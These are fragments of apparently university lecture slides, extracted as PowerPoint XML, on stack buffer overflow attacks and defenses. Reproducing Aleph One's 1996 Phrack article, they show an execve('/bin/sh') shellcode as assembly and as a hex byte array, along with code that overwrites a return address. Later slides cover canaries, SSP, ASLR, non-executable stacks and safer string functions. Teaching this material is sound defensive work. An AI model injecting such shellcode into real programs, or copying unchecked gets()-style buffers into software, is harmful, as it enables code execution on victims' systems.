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Arim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Arim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3: Jan 29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682558" y="0"/>
            <a:ext cx="10515600" cy="75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Program Stack Layout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914400" y="1136149"/>
            <a:ext cx="458301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void function(int a, int b, int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 buffer1[5];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 buffer2[10];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 *ret;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ret = buffer1 + 12;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(*ret) += 4; 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                                  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OUTPUT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?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x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function(1,2,3);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x = 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printf("%d\n",x);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96432" y="110541"/>
            <a:ext cx="10515600" cy="75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Corrupting the Stack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398165" y="2723360"/>
            <a:ext cx="46229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foo(char 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my_buf[40];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gets(my_buf);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(my_buf):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&lt;49+ byte string&gt;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Shape 223"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="244936" y="1818409"/>
            <a:ext cx="7150122" cy="4572001"/>
            <a:chOff x="204301" y="945572"/>
            <a:chExt cx="9539119" cy="5527964"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="224" name="Shape 224"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3408446" y="945572"/>
              <a:ext cx="1398202" cy="55279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769639" y="1804319"/>
              <a:ext cx="4010812" cy="48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(Modified) Return  Address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Shape 226"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3408446" y="1550273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227" name="Shape 227"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3408446" y="2223176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3408446" y="2885293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229" name="Shape 229"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3399922" y="3536339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230" name="Shape 230"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3408446" y="5491280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231" name="Shape 231"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5209332" y="2280857"/>
              <a:ext cx="24493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args (char b)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167584" y="3005435"/>
              <a:ext cx="24238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variables (int x)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5439356" y="4102954"/>
              <a:ext cx="4304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variable buffer (char my_buf[40])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Shape 234"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2039815" y="5852160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35" name="Shape 235"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1107212" y="5054395"/>
              <a:ext cx="2717799" cy="87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" name="Shape 236"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1868658" y="2885293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37" name="Shape 237"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="204302" y="2457946"/>
              <a:ext cx="35020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 at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beginning of the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foo()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04301" y="1178717"/>
              <a:ext cx="3502084" cy="87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Pushed onto the stack by the caller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x="1579315" y="1633846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2208684" y="2292877"/>
              <a:ext cx="68005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241" name="Shape 241"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2217164" y="1633846"/>
              <a:ext cx="0" cy="65903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sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Shape 242"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5419569" y="1183279"/>
            <a:ext cx="44293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evil_function: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sys_call(execve) with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Appropriate arguements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Shape 243"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038466" y="1449763"/>
            <a:ext cx="1381103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44" name="Shape 244"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038061" y="1454727"/>
            <a:ext cx="0" cy="52497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630063" y="1968109"/>
            <a:ext cx="407563" cy="613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46" name="Shape 246"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3704573" y="2085584"/>
            <a:ext cx="345811" cy="532356"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="2173" y="120000"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="50529" y="117470"/>
                  <a:pt x="98886" y="114941"/>
                  <a:pt x="114099" y="98823"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="129313" y="82705"/>
                  <a:pt x="112469" y="39764"/>
                  <a:pt x="93453" y="23293"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="74436" y="6823"/>
                  <a:pt x="37218" y="3411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96533" y="-1"/>
            <a:ext cx="10515600" cy="107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Smashing the Stack for Fun and Profit (Phrack 1996, Vol. 7 Issue 49)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821365" y="1604265"/>
            <a:ext cx="374333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#include &lt;stdio.h&gt;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void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{ char *name[2];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name[0] = "/bin/sh";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name[1] = NULL;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execve(name[0], name,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946073" y="1079652"/>
            <a:ext cx="680072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0x8000130 : pushl %ebp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0x8000131 : movl %esp,%ebp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0x8000133 : subl $0x8,%esp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0x8000136 : movl $0x80027b8,0xfffffff8(%ebp)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0x800013d : movl $0x0,0xfffffffc(%ebp)          /*args for execv*/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0x8000144 : pushl $0x0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0x8000146 : leal 0xfffffff8(%ebp),%eax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0x8000149 : pushl %eax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0x800014a : movl 0xfffffff8(%ebp),%eax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0x800014d : pushl %eax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0x800014e : call 0x80002bc &lt;__execve&gt;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0x8000153 : addl $0xc,%esp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0x8000156 : movl %ebp,%esp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0x8000158 : popl %ebp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0x8000159 : ret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51060" y="-270164"/>
            <a:ext cx="10515600" cy="107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Smashing the Stack for Fun and Profit (Aleph One, 1996)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216724" y="1204843"/>
            <a:ext cx="771698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0x80002bc &lt;__execve&gt;: pushl %ebp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0x80002bd &lt;__execve+1&gt;: movl %esp,%ebp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0x80002bf &lt;__execve+3&gt;: pushl %ebx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0x80002c0 &lt;__execve+4&gt;: movl $0xb,%eax    /* sys call no. into EAX reg*/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0x80002ce &lt;__execve+18&gt;: int $0x80      /* Go inside the kernel */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0x80002e6 &lt;__execve+42&gt;: popl %ebx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0x80002e7 &lt;__execve+43&gt;: movl %ebp,%esp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0x80002e9 &lt;__execve+45&gt;: popl %ebp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0x80002ea &lt;__execve+46&gt;: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0x80002eb &lt;__execve+47&gt;: nop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551060" y="-270164"/>
            <a:ext cx="10515600" cy="107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Smashing the Stack for Fun and Profit (Aleph One, 1996)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760860" y="1253249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string_addr,string_addr_addr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movb $0x0,null_byte_addr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$0x0,null_addr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$0xb,%eax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string_addr,%ebx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leal string_addr,%ecx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leal null_string,%edx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$0x80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$0x1, %eax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$0x0, %ebx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$0x80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.string \”/bin/sh\”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735926" y="1614680"/>
            <a:ext cx="42418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Effective execution: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main() function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body + execv() call + exit() call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735926" y="2743387"/>
            <a:ext cx="38316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How do you obtain the address of the string ?</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="20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551060" y="-270164"/>
            <a:ext cx="10515600" cy="107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Smashing the Stack for Fun and Profit (Aleph One, 1996)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2060864" y="1149478"/>
            <a:ext cx="6096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offset-to-call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popl %esi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%esi,array-offset(%esi)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movb $0x0,nullbyteoffset(%esi)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$0x0,null-offset(%esi)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$0xb,%eax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%esi,%ebx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leal array-offset(%esi),%ecx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leal null-offset(%esi),%edx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$0x80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$0x1, %eax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 $0x0, %ebx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$0x80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offset-to-popl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.string \”/bin/sh\”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047653" y="1552334"/>
            <a:ext cx="40174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Obtaining the effective address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1"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string “/bin/sh”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551060" y="-270164"/>
            <a:ext cx="10515600" cy="1079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Smashing the Stack for Fun and Profit (Aleph One, 1996)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820882" y="809489"/>
            <a:ext cx="916478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shellcode[]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"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"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"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"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"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"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"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";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*ret;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 = (int *)&amp;ret + 2;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(*ret) = (int)shellcode;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705080" y="1"/>
            <a:ext cx="10648720" cy="1035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Ways to Defend Against Such Attacks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05080" y="1035587"/>
            <a:ext cx="10512136" cy="529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“securer” library routines instead of the vulnerable ones – C99 functions (fgets(), getchar()), C11 Annex K functions (gets_s(), strcpy_s(), strncpy_s() etc.), Dynamic memory allocation (e.g. malloc() family, getline() etc.), OpenBSD (strlcpy() and strlcat()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Code Checking (Provided by GCC)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Canaries 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StackGuards and Stack Smashing Protection (default in GCC)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Non-Executable Stacks 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non-executable memory pages.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W^X Pages: You cannot both write and execute </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1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pages </a:t>
            </a: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(enforced using the Intel NX bit).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 Layout Randomization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509155" y="-164811"/>
            <a:ext cx="108619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“Securely” Handling Strings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509155" y="820882"/>
            <a:ext cx="10844645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strcpy(char * dst, char*src) :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 unsafe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Use!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strncpy(char *dst, char *src, size_t size)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way to use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size of src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way to use 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size of destination buffer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: No NULL termination. You need to terminate it yourself.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strlcpy(char *dst, char *src, size_t size) (OpenBSD)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 NULL terminated.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C99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getchar()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fgets(char *buf, sizeof(buf), FILE *input_stream)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Allocation Functions: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size) (and friends) and free()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getline(char **lineptr,size_t *n,FILE *stream) (needs to be explicitly </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1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free()</a:t>
            </a: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-ed)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-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C11 Annex K bounds checking function (primarily in Windows)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gets_s(char *buf, size_t sizeInChars)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-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strcpy_s(char *s1, rsize_t s1max, const char *s2)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838200" y="-1128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Canaries and Stack Guards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581891" y="987135"/>
            <a:ext cx="10771909" cy="5189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derived from a bird, Canary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indicate buffer overflow, stack smashing.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pseudo-randomly generated value use to check if the return value is modified or not.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 checked before return from a function.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as long as the canary value stays secret.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EVADED if canary is known.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DEFENSE.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564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Week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23455" y="1059872"/>
            <a:ext cx="11118271" cy="5704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Discretionary Access Controls (DAC) model in *nix.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Control Lists (ACL) in Linux.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Access Controls (MAC) – SELinux.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ACL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71350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Smashing Protector (SSP)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713509" y="1101436"/>
            <a:ext cx="10640291" cy="547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by IBM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ProPolice.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command line options –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-fstack-protector, -fno-stack-protector, -fstack-protector-all and –fno-stack-protector-all.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Reorders declaration of variable and buffers.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Pads variables and arrays (buffers) with canaries to detect overflows.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6155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 Layout Randomization (ASLR)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07027" y="1170996"/>
            <a:ext cx="10508673" cy="51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Randomizes the memory locations of the stack, heap, data.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prevent stack corruption.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it hard for the attacker to guess the location of system function, library routines (for return-to-libc attacks) etc.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FreeBSD , Android 4.0 Ice Cream Sandwitch, Linux, Windows Vista (and later OSes), OpenBSD (2014).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692728" y="-92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Executable Stacks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796636" y="11086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executing code residing on stack.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Prevents stack overflow attacks, but doesn’t defend against attacks involving the heap or data segments.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work with programs that NEED to execute code from the stack e.g. Linux signal delivery and GCC trampolines.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for the Next Few Weeks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and Details of Buffer Overflow Attacks.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smashing attacks – then and now.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defense strategies and if they are still applicable.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attacks derived from the such attacks – Return Oriented. Programming, Return to Libc Attacks.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Defense Against Such Attacks.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Overflow Attacks and Defense.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Overflow Attacks and Defense.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Practices to Defend Against Smashing Attacks.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TOCTOU Attacks.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Penetrating Testing Tools.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Evaluation and Testing Tools.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13509" y="-92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13509" y="1018309"/>
            <a:ext cx="10640291" cy="5158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 – Where exactly are the security vulnerabilities – crypto ? libraries ? usage ? Implementation ? use cases ? error conditions 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level vulnerabilities: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Unmediated access.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– Often programs written in “C/C++” programs are the culprits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Incorrect input validation.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Unhandled corner cases and exceptions.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– related to the points above.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and Execution Attacks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Overflow Attacks – Most common and “conceptually” easy vulnerability to execute.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to modify the program flow execution by modifying program/function return address (through modifying the contest of stack (and sometimes the heap)).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10065" y="76724"/>
            <a:ext cx="10515600" cy="798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Virtual Memory Layout (Endian Agnostic)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408446" y="945572"/>
            <a:ext cx="1398202" cy="55279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3399788" y="1178671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396545" y="2770766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406271" y="3617076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416000" y="4706577"/>
            <a:ext cx="1400377" cy="5859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15999" y="5358338"/>
            <a:ext cx="1400377" cy="8770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774588" y="2854750"/>
            <a:ext cx="68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716656" y="1304171"/>
            <a:ext cx="692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970649" y="6104204"/>
            <a:ext cx="1343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091306" y="809339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4975127" y="1304171"/>
            <a:ext cx="9728" cy="4922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4984855" y="2770766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4991337" y="3613831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5001063" y="4644129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5001063" y="5491280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3396544" y="4273037"/>
            <a:ext cx="1400377" cy="3229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435603" y="920130"/>
            <a:ext cx="1398202" cy="555340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8444031" y="922711"/>
            <a:ext cx="1400377" cy="7107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8475974" y="885933"/>
            <a:ext cx="1382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013940" y="6104204"/>
            <a:ext cx="1343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7134597" y="809339"/>
            <a:ext cx="12538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10034626" y="4999075"/>
            <a:ext cx="9728" cy="4922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10044354" y="2477795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 rot="10800000">
            <a:off x="10048717" y="419977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10044354" y="583222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8444031" y="2447654"/>
            <a:ext cx="1400377" cy="6618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8451891" y="5679746"/>
            <a:ext cx="1400377" cy="7947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Reserved by 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8445276" y="4912660"/>
            <a:ext cx="1400377" cy="7785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445166" y="4087359"/>
            <a:ext cx="1400377" cy="803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8445166" y="3137788"/>
            <a:ext cx="1400377" cy="9486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445166" y="1633497"/>
            <a:ext cx="1400377" cy="8163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Shape 146"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10044354" y="176461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 rot="10800000">
            <a:off x="10044354" y="96433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10044354" y="3224082"/>
            <a:ext cx="0" cy="5859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1735420" y="4937099"/>
            <a:ext cx="16937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*NIX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408734" y="5241871"/>
            <a:ext cx="1015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Win32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82558" y="0"/>
            <a:ext cx="10515600" cy="75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Program Stack Layout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408446" y="945572"/>
            <a:ext cx="1398202" cy="55279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793222" y="1691045"/>
            <a:ext cx="18425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 Address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3408446" y="1550273"/>
            <a:ext cx="13982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3408446" y="2223176"/>
            <a:ext cx="13982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3408446" y="2885293"/>
            <a:ext cx="13982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3399922" y="3536339"/>
            <a:ext cx="13982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3408446" y="5491280"/>
            <a:ext cx="13982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63" name="Shape 163"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771936" y="2292877"/>
            <a:ext cx="24493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args (char b)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776283" y="3167007"/>
            <a:ext cx="24238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 (int x)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8428146" y="1090881"/>
            <a:ext cx="233339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foo(char b){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my_buf[40];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4764444" y="4018107"/>
            <a:ext cx="4304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 buffer (char my_buf[40])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2039815" y="5852160"/>
            <a:ext cx="13601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1579315" y="5064748"/>
            <a:ext cx="17645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Stack Pointer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Shape 169"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1868658" y="2885293"/>
            <a:ext cx="13601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170" name="Shape 170"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="117615" y="2480913"/>
            <a:ext cx="35020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 at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 of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foo()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88772" y="1141502"/>
            <a:ext cx="35020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Pushed onto the stack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1579315" y="1633846"/>
            <a:ext cx="136010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2208684" y="2292877"/>
            <a:ext cx="6800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2217164" y="1633846"/>
            <a:ext cx="0" cy="659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682558" y="0"/>
            <a:ext cx="10515600" cy="75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Program Stack Layout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442722" y="952487"/>
            <a:ext cx="713893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void function(int a, int b, int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{ char buffer1[5];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 buffer2[10];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442722" y="2691254"/>
            <a:ext cx="218842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{ function(1,2,3);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092325" y="2416183"/>
            <a:ext cx="947965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pushl $3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pushl $2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pushl $1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call function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092325" y="850137"/>
            <a:ext cx="1967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pushl %ebp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movl %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="180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m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subl $20,%esp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Shape 184"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6885542" y="1962381"/>
            <a:ext cx="0" cy="42827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96432" y="110541"/>
            <a:ext cx="10515600" cy="75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Corrupting the Stack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394849" y="2580915"/>
            <a:ext cx="46229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foo(char b){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my_buf[40];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gets(my_buf);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(my_buf):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 times) ‘A’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244936" y="1818409"/>
            <a:ext cx="7150122" cy="4572001"/>
            <a:chOff x="204301" y="945572"/>
            <a:chExt cx="9539119" cy="5527964"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="192" name="Shape 192"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3408446" y="945572"/>
              <a:ext cx="1398202" cy="552796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774780" y="1679946"/>
              <a:ext cx="4010812" cy="48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(Modified) Return  Address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3408446" y="1550273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3408446" y="2223176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3408446" y="2885293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3399922" y="3536339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3408446" y="5491280"/>
              <a:ext cx="1398202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5209332" y="2280857"/>
              <a:ext cx="24493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args (char b)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167584" y="3005435"/>
              <a:ext cx="24238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variables (int x)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439356" y="4102954"/>
              <a:ext cx="43040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variable buffer (char my_buf[40])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Shape 202"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2039815" y="5852160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1107212" y="5054395"/>
              <a:ext cx="2717799" cy="87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1868658" y="2885293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204302" y="2457946"/>
              <a:ext cx="350208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 at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beginning of the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foo()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301" y="1178717"/>
              <a:ext cx="3502084" cy="873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Pushed onto the stack by the caller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Shape 207"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1579315" y="1633846"/>
              <a:ext cx="136010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2208684" y="2292877"/>
              <a:ext cx="680054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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="209" name="Shape 209"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2217164" y="1633846"/>
              <a:ext cx="0" cy="65903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med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Shape 210"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6731306" y="2688116"/>
            <a:ext cx="1717329" cy="2528568"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="120000" y="113302"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="110256" y="119022"/>
                  <a:pt x="100512" y="124742"/>
                  <a:pt x="93076" y="113772"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85641" y="102803"/>
                  <a:pt x="90897" y="66445"/>
                  <a:pt x="75384" y="47483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59871" y="28521"/>
                  <a:pt x="29935" y="14260"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="22225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